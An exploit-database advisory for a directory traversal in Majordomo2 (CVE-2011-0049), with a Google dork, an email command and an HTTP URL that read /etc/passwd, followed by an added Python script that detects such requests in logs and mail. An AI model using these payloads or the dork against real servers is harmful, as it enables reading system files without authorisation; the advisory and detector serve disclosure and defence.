exploitdb, Michael Brooks, EDB-ID:16103
History: Feb 03, 2011 - 12:00 a.m.

Majordomo2 - 'SMTP/HTTP' Directory Traversal

2011-02-03 00:00:00
Michael Brooks
www.exploit-db.com
AI Score: 6.5 Medium (Confidence: Low)
CVSS2: 5 Medium (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE
EPSS: 0.902 High (Percentile: 98.7%)

Original Advisory: https://sitewat.ch/en/Advisory/View/1
Credit: Michael Brooks (https://sitewat.ch)
Vulnerability: Directory Traversal
Software: Majordomo2
Identifier: CVE-2011-0049
Vendor: http://www.mj2.org/
Affected Build: 20110121 and prior
Google dork: inurl:mj_wwwusr

Special thanks to Dave Miller, Reed Loden and the rest of the Mozilla
security team for handling the issue.

This vulnerability is exploitable via ALL of Majordomo2's interfaces.
*Including e-mail*. Send an email to majordomo's mail interface (for example:
[email protected]) with the body of the message as follows:
help ../../../../../../../../../../../../../etc/passwd

I'll give you one guess as to the contents of the response email ;).

PoC for HTTP:
http://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd
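
A detection check for both vectors described above, as an added example (not part of the original advisory or of Majordomo2): it flags access-log requests to mj_wwwusr whose help `extra` parameter contains a `..` path segment, and mail bodies whose `help` command carries one. The combined access-log format, the function names and all sample lines are assumptions constructed for illustration; only GET query strings are inspected.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# A ".." path segment, with / or \ as the separator.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def _has_traversal(value):
    # Decode repeatedly so double-encoded input (%252e%252e) is caught too.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return bool(TRAVERSAL.search(value))

def suspicious_http(log_line):
    """True for an mj_wwwusr help request whose 'extra' contains '..'."""
    m = REQUEST.search(log_line)
    if not m:
        return False
    url = urlsplit(m.group(1))
    params = parse_qs(url.query, keep_blank_values=True)  # decodes once
    if not url.path.endswith("/mj_wwwusr") or "help" not in params.get("func", []):
        return False
    return any(_has_traversal(v) for v in params.get("extra", []))

def suspicious_mail_command(body):
    """Return 'help' command lines whose argument contains '..'."""
    hits = []
    for line in body.splitlines():
        parts = line.strip().split(None, 1)
        # Case-insensitive match on the command word is an assumption.
        if len(parts) == 2 and parts[0].lower() == "help" and _has_traversal(parts[1]):
            hits.append(line.strip())
    return hits

# Constructed sample input (not real logs or mail).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Feb/2011:10:00:00 +0000] "GET /cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../etc/passwd HTTP/1.1" 200 1532',
    '192.0.2.11 - - [03/Feb/2011:10:00:05 +0000] "GET /cgi-bin/mj_wwwusr?list=GLOBAL&func=help&extra=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1532',
    '192.0.2.12 - - [03/Feb/2011:10:00:09 +0000] "GET /cgi-bin/mj_wwwusr?list=GLOBAL&func=help&extra=subscribe HTTP/1.1" 200 4410',
]
SAMPLE_MAIL = "help subscribe\nhelp ../../../../etc/passwd\n"

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(suspicious_http(entry), entry.split('"')[1])
    print(suspicious_mail_command(SAMPLE_MAIL))
```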
